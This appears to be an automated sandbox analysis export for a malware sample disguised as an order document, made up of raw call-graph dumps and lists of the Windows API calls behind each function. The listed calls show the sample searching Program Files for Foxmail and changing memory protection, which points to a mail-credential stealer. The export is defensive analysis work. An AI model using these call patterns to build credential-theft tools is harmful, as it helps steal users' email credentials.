7591->7593 7592->7556 7592->7563 7594 344b62ac ___std_exception_copy 26 API calls 7593->7594 7594->7592 7596 344b9a2e ___DestructExceptionObject 7595->7596 7597 344b9a4e 7596->7597 7598 344b9a36 7596->7598 7599 344b9aec 7597->7599 7605 344b9a83 7597->7605 7620 344b6355 7598->7620 7602 344b6355 __dosmaperr 20 API calls 7599->7602 7604 344b9af1 7602->7604 7603 344b6368 _free 20 API calls 7617 344b9a43 _abort 7603->7617 7606 344b6368 _free 20 API calls 7604->7606 7623 344b8c7b RtlEnterCriticalSection 7605->7623 7608 344b9af9 7606->7608 7610 344b62ac ___std_exception_copy 26 API calls 7608->7610 7609 344b9a89 7611 344b9aba 7609->7611 7612 344b9aa5 7609->7612 7610->7617 7624 344b9b0d 7611->7624 7613 344b6368 _free 20 API calls 7612->7613 7616 344b9aaa 7613->7616 7615 344b9ab5 7675 344b9ae4 7615->7675 7618 344b6355 __dosmaperr 20 API calls 7616->7618 7617->7572 7618->7615 7621 344b5b7a __dosmaperr 20 API calls 7620->7621 7622 344b635a 7621->7622 7622->7603 7623->7609 7625 344b9b3b 7624->7625 7663 344b9b34 7624->7663 7626 344b9b3f 7625->7626 7627 344b9b5e 7625->7627 7629 344b6355 __dosmaperr 20 API calls 7626->7629 7630 344b9baf 7627->7630 7631 344b9b92 7627->7631 7628 344b2ada _ValidateLocalCookies 5 API calls 7632 344b9d15 7628->7632 7633 344b9b44 7629->7633 7635 344b9bc5 7630->7635 7678 344ba00b 7630->7678 7634 344b6355 __dosmaperr 20 API calls 7631->7634 7632->7615 7636 344b6368 _free 20 API calls 7633->7636 7638 344b9b97 7634->7638 7681 344b96b2 7635->7681 7640 344b9b4b 7636->7640 7642 344b6368 _free 20 API calls 7638->7642 7643 344b62ac ___std_exception_copy 26 API calls 7640->7643 7646 344b9b9f 7642->7646 7643->7663 7644 344b9c0c 7650 344b9c20 7644->7650 7651 344b9c66 WriteFile 7644->7651 7645 344b9bd3 7647 344b9bf9 7645->7647 7648 344b9bd7 7645->7648 7649 344b62ac ___std_exception_copy 26 API calls 7646->7649 7693 344b9492 GetConsoleCP 7647->7693 7652 344b9ccd 7648->7652 7688 344b9645 7648->7688 7649->7663 7655 344b9c28 7650->7655 7656 344b9c56 7650->7656 7654 
344b9c89 GetLastError 7651->7654 7659 344b9bef 7651->7659 7652->7663 7664 344b6368 _free 20 API calls 7652->7664 7654->7659 7660 344b9c2d 7655->7660 7661 344b9c46 7655->7661 7719 344b9728 7656->7719 7659->7652 7659->7663 7667 344b9ca9 7659->7667 7660->7652 7704 344b9807 7660->7704 7711 344b98f5 7661->7711 7663->7628 7666 344b9cf2 7664->7666 7668 344b6355 __dosmaperr 20 API calls 7666->7668 7669 344b9cb0 7667->7669 7670 344b9cc4 7667->7670 7668->7663 7671 344b6368 _free 20 API calls 7669->7671 7726 344b6332 7670->7726 7673 344b9cb5 7671->7673 7674 344b6355 __dosmaperr 20 API calls 7673->7674 7674->7663 7767 344b8c9e RtlLeaveCriticalSection 7675->7767 7677 344b9aea 7677->7617 7731 344b9f8d 7678->7731 7753 344b8dbc 7681->7753 7683 344b96c2 7684 344b96c7 7683->7684 7685 344b5af6 _abort 38 API calls 7683->7685 7684->7644 7684->7645 7686 344b96ea 7685->7686 7686->7684 7687 344b9708 GetConsoleMode 7686->7687 7687->7684 7689 344b969f 7688->7689 7692 344b966a 7688->7692 7689->7659 7690 344ba181 WriteConsoleW CreateFileW 7690->7692 7691 344b96a1 GetLastError 7691->7689 7692->7689 7692->7690 7692->7691 7698 344b9607 7693->7698 7702 344b94f5 7693->7702 7694 344b2ada _ValidateLocalCookies 5 API calls 7695 344b9641 7694->7695 7695->7659 7697 344b79e6 40 API calls __fassign 7697->7702 7698->7694 7699 344b957b WideCharToMultiByte 7699->7698 7700 344b95a1 WriteFile 7699->7700 7701 344b962a GetLastError 7700->7701 7700->7702 7701->7698 7702->7697 7702->7698 7702->7699 7703 344b95d2 WriteFile 7702->7703 7762 344b7c19 7702->7762 7703->7701 7703->7702 7705 344b9816 7704->7705 7706 344b98d8 7705->7706 7708 344b9894 WriteFile 7705->7708 7707 344b2ada _ValidateLocalCookies 5 API calls 7706->7707 7709 344b98f1 7707->7709 7708->7705 7710 344b98da GetLastError 7708->7710 7709->7659 7710->7706 7713 344b9904 7711->7713 7712 344b9a0f 7714 344b2ada _ValidateLocalCookies 5 API calls 7712->7714 7713->7712 7715 344b9986 WideCharToMultiByte 7713->7715 7717 344b99bb WriteFile 7713->7717 7716 344b9a1e 
7714->7716 7715->7717 7718 344b9a07 GetLastError 7715->7718 7716->7659 7717->7713 7717->7718 7718->7712 7723 344b9737 7719->7723 7720 344b97ea 7722 344b2ada _ValidateLocalCookies 5 API calls 7720->7722 7721 344b97a9 WriteFile 7721->7723 7724 344b97ec GetLastError 7721->7724 7725 344b9803 7722->7725 7723->7720 7723->7721 7724->7720 7725->7659 7727 344b6355 __dosmaperr 20 API calls 7726->7727 7728 344b633d _free 7727->7728 7729 344b6368 _free 20 API calls 7728->7729 7730 344b6350 7729->7730 7730->7663 7740 344b8d52 7731->7740 7733 344b9f9f 7734 344b9fb8 SetFilePointerEx 7733->7734 7735 344b9fa7 7733->7735 7737 344b9fac 7734->7737 7738 344b9fd0 GetLastError 7734->7738 7736 344b6368 _free 20 API calls 7735->7736 7736->7737 7737->7635 7739 344b6332 __dosmaperr 20 API calls 7738->7739 7739->7737 7741 344b8d5f 7740->7741 7742 344b8d74 7740->7742 7743 344b6355 __dosmaperr 20 API calls 7741->7743 7745 344b6355 __dosmaperr 20 API calls 7742->7745 7748 344b8d99 7742->7748 7744 344b8d64 7743->7744 7747 344b6368 _free 20 API calls 7744->7747 7746 344b8da4 7745->7746 7749 344b6368 _free 20 API calls 7746->7749 7750 344b8d6c 7747->7750 7748->7733 7751 344b8dac 7749->7751 7750->7733 7752 344b62ac ___std_exception_copy 26 API calls 7751->7752 7752->7750 7754 344b8dc9 7753->7754 7756 344b8dd6 7753->7756 7755 344b6368 _free 20 API calls 7754->7755 7757 344b8dce 7755->7757 7758 344b8de2 7756->7758 7759 344b6368 _free 20 API calls 7756->7759 7757->7683 7758->7683 7760 344b8e03 7759->7760 7761 344b62ac ___std_exception_copy 26 API calls 7760->7761 7761->7757 7763 344b5af6 _abort 38 API calls 7762->7763 7764 344b7c24 7763->7764 7765 344b7a00 __fassign 38 API calls 7764->7765 7766 344b7c34 7765->7766 7766->7702 7767->7677 7771 344bad24 7768->7771 7770 344badca 7770->7592 7772 344bad30 ___DestructExceptionObject 7771->7772 7782 344b8c7b RtlEnterCriticalSection 7772->7782 7774 344bad3e 7775 344bad70 7774->7775 7776 344bad65 7774->7776 7778 344b6368 _free 20 API calls 7775->7778 7783 
Execution Graph (placeholder): the serialized node/edge dump of the interactive call graph was removed here because it carries no readable content outside the viewer. The information recoverable from it is the set of Windows API calls reached from functions in two address ranges of the sample.

Functions at 0x344bXXXX (mostly CRT runtime and startup code, e.g. ___scrt_fastfail, _ValidateLocalCookies, __dosmaperr, _free, ___std_exception_copy, dllmain_raw / dllmain_crt_process_attach / dllmain_crt_process_detach) call: IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, RaiseException, RtlUnwind, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RtlAllocateHeap, HeapFree, GetProcessHeap, GetLastError, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, GetProcAddress, LoadLibraryExW, FreeLibrary, RtlDecodePointer, GetModuleFileNameA, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentVariableW, GetStartupInfoW, GetStdHandle, SetStdHandle, GetFileType, CloseHandle, GetOEMCP, GetACP, GetCPInfo, IsValidCodePage, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW, FindFirstFileExA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter.

File-handling functions in the same range call: lstrlenW, lstrcatW, FindFirstFileW, FindNextFileW, FindClose, GetFileAttributesW, CopyFileW, CreateFileW, GetFileSize, ReadFile, DeleteFileW, CloseHandle.

Functions at 0x40XXXX (the sample's own image) call: GetFileAttributesW, CreateFileW, lstrlenW, CharPrevW, SetErrorMode, GetVersion, GetSystemDirectoryW, lstrlenA, GetModuleHandleA, OleInitialize, SHGetFileInfoW, ordinal #17, lstrcpynW, GetCommandLineW.

The graph data is cut off at this point in the extracted page.
7436 405cf0 7417->7436 7420 4036d4 GetTempPathW 7440 403471 7420->7440 7422 4036ec DeleteFileW 7424 403015 7422->7424 7426 406795 wsprintfW LoadLibraryExW 7425->7426 7426->7405 7429 406809 GetProcAddress 7428->7429 7430 4067ff 7428->7430 7432 403514 7429->7432 7431 406773 3 API calls 7430->7431 7433 406805 7431->7433 7432->7409 7433->7429 7433->7432 7434->7415 7435->7417 7437 405cf6 7436->7437 7438 4035aa CharNextW 7437->7438 7439 405cfd CharNextW 7437->7439 7438->7420 7439->7437 7450 40669d 7440->7450 7442 403487 7442->7422 7443 40347d 7443->7442 7459 405cc3 lstrlenW CharPrevW 7443->7459 7457 4066aa 7450->7457 7451 406720 7452 406725 CharPrevW 7451->7452 7455 406746 7451->7455 7452->7451 7453 406713 CharNextW 7453->7451 7453->7457 7454 405cf0 CharNextW 7454->7457 7455->7443 7456 4066ff CharNextW 7456->7457 7457->7451 7457->7453 7457->7454 7457->7456 7458 40670e CharNextW 7457->7458 7458->7453 7460 40348f 7459->7460 7461 405cdf lstrcatW 7459->7461 7462 4059a2 CreateDirectoryW 7460->7462 7461->7460 7463 403495 7462->7463 7464 4059b6 GetLastError 7462->7464 7465 405f13 7463->7465 7464->7463 7466 405f20 GetTickCount GetTempFileNameW 7465->7466 7467 4034a0 7466->7467 7468 405f56 7466->7468 7467->7422 7468->7466 7468->7467 7469 344b60ac 7470 344b60dd 7469->7470 7471 344b60b7 7469->7471 7471->7470 7472 344b60c7 FreeLibrary 7471->7472 7472->7471 8165 344b21a1 ___scrt_dllmain_exception_filter 8166 344b81a0 8167 344b81d9 8166->8167 8168 344b81dd 8167->8168 8179 344b8205 8167->8179 8169 344b6368 _free 20 API calls 8168->8169 8171 344b81e2 8169->8171 8170 344b8529 8172 344b2ada _ValidateLocalCookies 5 API calls 8170->8172 8173 344b62ac ___std_exception_copy 26 API calls 8171->8173 8174 344b8536 8172->8174 8175 344b81ed 8173->8175 8176 344b2ada _ValidateLocalCookies 5 API calls 8175->8176 8177 344b81f9 8176->8177 8179->8170 8180 344b80c0 8179->8180 8183 344b80db 8180->8183 8181 344b2ada _ValidateLocalCookies 5 API calls 8182 344b8152 8181->8182 8182->8179 8183->8181 6358 
344bc7a7 6359 344bc7be 6358->6359 6363 344bc82c 6358->6363 6359->6363 6370 344bc7e6 GetModuleHandleA 6359->6370 6360 344bc835 GetModuleHandleA 6364 344bc83f 6360->6364 6362 344bc872 6363->6360 6363->6362 6363->6364 6364->6363 6366 344bc85f GetProcAddress 6364->6366 6365 344bc7dd 6365->6363 6365->6364 6367 344bc800 GetProcAddress 6365->6367 6366->6363 6367->6363 6368 344bc80d VirtualProtect 6367->6368 6368->6363 6369 344bc81c VirtualProtect 6368->6369 6369->6363 6371 344bc7ef 6370->6371 6377 344bc82c 6370->6377 6382 344bc803 GetProcAddress 6371->6382 6373 344bc7f4 6376 344bc800 GetProcAddress 6373->6376 6373->6377 6374 344bc872 6375 344bc835 GetModuleHandleA 6380 344bc83f 6375->6380 6376->6377 6378 344bc80d VirtualProtect 6376->6378 6377->6374 6377->6375 6377->6380 6378->6377 6379 344bc81c VirtualProtect 6378->6379 6379->6377 6380->6377 6381 344bc85f GetProcAddress 6380->6381 6381->6377 6383 344bc82c 6382->6383 6384 344bc80d VirtualProtect 6382->6384 6386 344bc872 6383->6386 6387 344bc835 GetModuleHandleA 6383->6387 6384->6383 6385 344bc81c VirtualProtect 6384->6385 6385->6383 6389 344bc83f 6387->6389 6388 344bc85f GetProcAddress 6388->6389 6389->6383 6389->6388 7895 344b1f3f 7896 344b1f4b ___DestructExceptionObject 7895->7896 7913 344b247c 7896->7913 7898 344b1f52 7899 344b1f7c 7898->7899 7900 344b2041 7898->7900 7907 344b1f57 ___scrt_is_nonwritable_in_current_image 7898->7907 7924 344b23de 7899->7924 7902 344b2639 ___scrt_fastfail 4 API calls 7900->7902 7903 344b2048 7902->7903 7904 344b1f8b __RTC_Initialize 7904->7907 7927 344b22fc RtlInitializeSListHead 7904->7927 7906 344b1f99 ___scrt_initialize_default_local_stdio_options 7928 344b46c5 7906->7928 7911 344b1fb8 7911->7907 7912 344b4669 _abort 5 API calls 7911->7912 7912->7907 7914 344b2485 7913->7914 7936 344b2933 IsProcessorFeaturePresent 7914->7936 7918 344b2496 7919 344b249a 7918->7919 7947 344b53c8 7918->7947 7919->7898 7922 344b24b1 7922->7898 7923 344b3529 ___vcrt_uninitialize 8 API calls 7923->7919 7978 
344b24b5 7924->7978 7926 344b23e5 7926->7904 7927->7906 7931 344b46dc 7928->7931 7929 344b2ada _ValidateLocalCookies 5 API calls 7930 344b1fad 7929->7930 7930->7907 7932 344b23b3 7930->7932 7931->7929 7933 344b23b8 ___scrt_release_startup_lock 7932->7933 7934 344b2933 ___isa_available_init IsProcessorFeaturePresent 7933->7934 7935 344b23c1 7933->7935 7934->7935 7935->7911 7937 344b2491 7936->7937 7938 344b34ea 7937->7938 7939 344b34ef ___vcrt_initialize_winapi_thunks 7938->7939 7950 344b3936 7939->7950 7942 344b34fd 7942->7918 7944 344b3505 7945 344b3510 7944->7945 7946 344b3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7944->7946 7945->7918 7946->7942 7974 344b7457 7947->7974 7951 344b393f 7950->7951 7953 344b3968 7951->7953 7955 344b34f9 7951->7955 7964 344b3be0 7951->7964 7954 344b3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7953->7954 7954->7955 7955->7942 7956 344b38e8 7955->7956 7969 344b3af1 7956->7969 7958 344b38fd 7958->7944 7960 344b3ba2 ___vcrt_FlsSetValue 6 API calls 7961 344b390b 7960->7961 7962 344b3918 7961->7962 7963 344b391b ___vcrt_uninitialize_ptd 6 API calls 7961->7963 7962->7944 7963->7958 7965 344b3a82 try_get_function 5 API calls 7964->7965 7966 344b3bfa 7965->7966 7967 344b3c18 InitializeCriticalSectionAndSpinCount 7966->7967 7968 344b3c03 7966->7968 7967->7968 7968->7951 7970 344b3a82 try_get_function 5 API calls 7969->7970 7971 344b3b0b 7970->7971 7972 344b3b24 TlsAlloc 7971->7972 7973 344b38f2 7971->7973 7973->7958 7973->7960 7975 344b7470 7974->7975 7976 344b2ada _ValidateLocalCookies 5 API calls 7975->7976 7977 344b24a3 7976->7977 7977->7922 7977->7923 7979 344b24c8 7978->7979 7980 344b24c4 7978->7980 7981 344b2639 ___scrt_fastfail 4 API calls 7979->7981 7983 344b24d5 ___scrt_release_startup_lock 7979->7983 7980->7926 7982 344b2559 7981->7982 7983->7926 8184 344b67bf 8189 344b67f4 8184->8189 8187 344b67db 8188 344b571e _free 20 API calls 8188->8187 8190 344b67cd 8189->8190 8191 344b6806 8189->8191 8190->8187 
8190->8188 8192 344b680b 8191->8192 8193 344b6836 8191->8193 8194 344b637b __dosmaperr 20 API calls 8192->8194 8193->8190 8200 344b71d6 8193->8200 8196 344b6814 8194->8196 8198 344b571e _free 20 API calls 8196->8198 8197 344b6851 8199 344b571e _free 20 API calls 8197->8199 8198->8190 8199->8190 8201 344b71e1 8200->8201 8202 344b7209 8201->8202 8203 344b71fa 8201->8203 8204 344b7218 8202->8204 8209 344b8a98 8202->8209 8205 344b6368 _free 20 API calls 8203->8205 8216 344b8acb 8204->8216 8207 344b71ff ___scrt_fastfail 8205->8207 8207->8197 8210 344b8ab8 RtlSizeHeap 8209->8210 8211 344b8aa3 8209->8211 8210->8204 8212 344b6368 _free 20 API calls 8211->8212 8213 344b8aa8 8212->8213 8214 344b62ac ___std_exception_copy 26 API calls 8213->8214 8215 344b8ab3 8214->8215 8215->8204 8217 344b8ad8 8216->8217 8218 344b8ae3 8216->8218 8219 344b56d0 21 API calls 8217->8219 8220 344b8aeb 8218->8220 8227 344b8af4 __dosmaperr 8218->8227 8224 344b8ae0 8219->8224 8221 344b571e _free 20 API calls 8220->8221 8221->8224 8222 344b8af9 8225 344b6368 _free 20 API calls 8222->8225 8223 344b8b1e RtlReAllocateHeap 8223->8224 8223->8227 8224->8207 8225->8224 8226 344b474f __dosmaperr 7 API calls 8226->8227 8227->8222 8227->8223 8227->8226 6995 344b543d 6996 344b5440 6995->6996 6997 344b55a8 _abort 38 API calls 6996->6997 6998 344b544c 6997->6998 7473 344b3eb3 7474 344b5411 38 API calls 7473->7474 7475 344b3ebb 7474->7475 6999 344b5630 7000 344b563b 6999->7000 7002 344b5664 7000->7002 7003 344b5660 7000->7003 7005 344b5eb7 7000->7005 7012 344b5688 7002->7012 7006 344b5c45 __dosmaperr 5 API calls 7005->7006 7007 344b5ede 7006->7007 7008 344b5efc InitializeCriticalSectionAndSpinCount 7007->7008 7009 344b5ee7 7007->7009 7008->7009 7010 344b2ada _ValidateLocalCookies 5 API calls 7009->7010 7011 344b5f13 7010->7011 7011->7000 7013 344b5695 7012->7013 7015 344b56b4 7012->7015 7014 344b569f RtlDeleteCriticalSection 7013->7014 7014->7014 7014->7015 7015->7003

                                        Control-flow Graph

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1137
                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1151
                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B115C
                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B116D
                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B117C
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1193
                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 344B11D0
                                        • FindClose.KERNEL32(00000000), ref: 344B11DB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                        • String ID:
                                        • API String ID: 1083526818-0
                                        • Opcode ID: 3631df396d4e8c5b81256cc1c50522bdb88f55fb2c79fe159e80d15f64cba54e
                                        • Instruction ID: 6bd7a07a22a79095eaafd9c73f0d2d190c41320cf25d6eb796e4a0d9220f3124
                                        • Opcode Fuzzy Hash: 3631df396d4e8c5b81256cc1c50522bdb88f55fb2c79fe159e80d15f64cba54e
                                        • Instruction Fuzzy Hash: 8B219575504748ABDB10DA749C4CF9B7B9CEF44358F00093EB5D8D3191EB30D60587A6

                                        Control-flow Graph

                                        APIs
                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 344B1434
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1137
                                          • Part of subcall function 344B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1151
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B115C
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B116D
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B117C
                                          • Part of subcall function 344B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1193
                                          • Part of subcall function 344B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 344B11D0
                                          • Part of subcall function 344B10F1: FindClose.KERNEL32(00000000), ref: 344B11DB
                                        • lstrlenW.KERNEL32(?), ref: 344B14C5
                                        • lstrlenW.KERNEL32(?), ref: 344B14E0
                                        • lstrlenW.KERNEL32(?,?), ref: 344B150F
                                        • lstrcatW.KERNEL32(00000000), ref: 344B1521
                                        • lstrlenW.KERNEL32(?,?), ref: 344B1547
                                        • lstrcatW.KERNEL32(00000000), ref: 344B1553
                                        • lstrlenW.KERNEL32(?,?), ref: 344B1579
                                        • lstrcatW.KERNEL32(00000000), ref: 344B1585
                                        • lstrlenW.KERNEL32(?,?), ref: 344B15AB
                                        • lstrcatW.KERNEL32(00000000), ref: 344B15B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                        • String ID: )$Foxmail$ProgramFiles
                                        • API String ID: 672098462-2938083778
                                        • Opcode ID: 74bbdbe8c74fc574da82a2b6bbca87d548d1289d7fe4199301ef4705b928d2f7
                                        • Instruction ID: bed7b6fad0716f0e895a4f5beaf410f4d77d1fa68f1e7a4ce21ba6191b3ba482
                                        • Opcode Fuzzy Hash: 74bbdbe8c74fc574da82a2b6bbca87d548d1289d7fe4199301ef4705b928d2f7
                                        • Instruction Fuzzy Hash: 3C81B275A00368BAEF20DBA0DC45FDE7379EF84700F0005AAF649E7191EA715A85CFA5

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleA.KERNEL32(344BC7DD), ref: 344BC7E6
                                        • GetModuleHandleA.KERNEL32(?,344BC7DD), ref: 344BC838
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 344BC860
                                          • Part of subcall function 344BC803: GetProcAddress.KERNEL32(00000000,344BC7F4), ref: 344BC804
                                          • Part of subcall function 344BC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC816
                                          • Part of subcall function 344BC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC82A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction ID: fb239d57ca10ffcd10bdc1f33bb25909a49a561c160fb4be6d7e7b7858350afe
                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction Fuzzy Hash: E201D244A45F41BCBF1156740CC5AAA5F989B276A3B50EB7EE0D0CA293D9A08506C3F6

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,344BC7DD), ref: 344BC838
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 344BC860
                                          • Part of subcall function 344BC7E6: GetModuleHandleA.KERNEL32(344BC7DD), ref: 344BC7E6
                                          • Part of subcall function 344BC7E6: GetProcAddress.KERNEL32(00000000,344BC7F4), ref: 344BC804
                                          • Part of subcall function 344BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC816
                                          • Part of subcall function 344BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC82A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction ID: d62451d44d80999ab1ce2e16ba5a93d3efa78a2c921df8eb960bb41e7bad48e6
                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction Fuzzy Hash: 9821F765548A816FFF118B744C846A66FD99B172A2F19CABED0C0CB243D5A88446C3F6

                                        Control-flow Graph

                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,344BC7F4), ref: 344BC804
                                        • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC816
                                        • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC82A
                                        • GetModuleHandleA.KERNEL32(?,344BC7DD), ref: 344BC838
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 344BC860
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProcProtectVirtual$HandleModule
                                        • String ID:
                                        • API String ID: 2152742572-0
                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction ID: 3b9aa3b18dee0ad21c56d6500e45b0308baf951e3b24e7ff3ecfa048f86827c4
                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction Fuzzy Hash: CFF0C285685F407CFE2146B40CC1AB65FCC8B676A3B10AA7EE1D0CB283D895850683F6
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 344B61DA
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 344B61E4
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 344B61F1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: b8d346c25d32f19fa3042759474808472ac00714ef6f69188682acc6f88d5a52
                                        • Instruction ID: 984b42f3fa7fccef10859ec550c7d1cc003354977efe0da48480b5da60c424d3
                                        • Opcode Fuzzy Hash: b8d346c25d32f19fa3042759474808472ac00714ef6f69188682acc6f88d5a52
                                        • Instruction Fuzzy Hash: 5B31C67590121C9BDF21DF64D98878DBBB4FF08310F5041EAE85CA7261E7709B858F55
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000,?,344B2082,344C2108,?,344B1F3A,?), ref: 344B4AD5
                                        • TerminateProcess.KERNEL32(00000000,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000,?,344B2082,344C2108,?,344B1F3A,?), ref: 344B4ADC
                                        • ExitProcess.KERNEL32 ref: 344B4AEE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: ca970a007489f54ef6ae2aeea21e8dc01697c2b160d1fbe5bc28a388b57a917d
